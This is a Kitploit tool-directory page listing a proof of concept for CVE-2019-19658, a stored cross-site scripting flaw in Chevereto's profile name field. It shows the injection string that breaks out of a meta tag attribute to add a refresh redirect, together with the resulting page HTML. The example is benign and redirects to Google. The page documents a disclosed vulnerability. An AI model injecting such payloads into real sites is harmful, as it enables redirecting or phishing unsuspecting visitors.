Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-19658 — Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core | Kitploit
Tools/GitHubGitHub/jra89/cve-2019-19658
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubjra89/cve-2019-19658

CVE-2019-19658

Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core

View Repository
116 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-19658

Chevereto stored XSS in profile page - 1.0.0 - 1.1.4 Free, <= 3.13.5 Core. A regular user can input HTML and script into their profile name and it will be executed on their profile page.

root@kitploit:~
/settings/profile

Name:

root@kitploit:~
0;https://www.google.se" http-equiv="refresh" data="

Result on profile page, which will redirect to Google:

root@kitploit:~
<meta name="twitter:title" content="0;https://www.google.com" http-equiv="refresh" data=" (admin)">



Registered user injects some script into the name field, in this case to redirect the user to Google



Someone enters the profile of /test and is then redirected

Download Tool